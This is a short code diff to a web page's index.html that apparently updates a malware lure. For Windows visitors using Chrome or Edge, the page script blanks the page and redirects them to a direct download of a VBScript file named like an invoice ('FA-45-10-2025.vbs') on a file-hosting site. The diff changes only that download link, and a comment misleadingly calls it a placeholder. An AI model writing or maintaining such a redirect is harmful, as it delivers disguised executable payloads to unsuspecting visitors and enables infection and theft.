--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-6.gofile.io/download/direct/521b79f3-b951-4b76-a7e8-c8011d8b28bf/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store5.gofile.io/download/direct/4f4dea47-48d6-4b13-974d-0b3fd1e26f7f/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
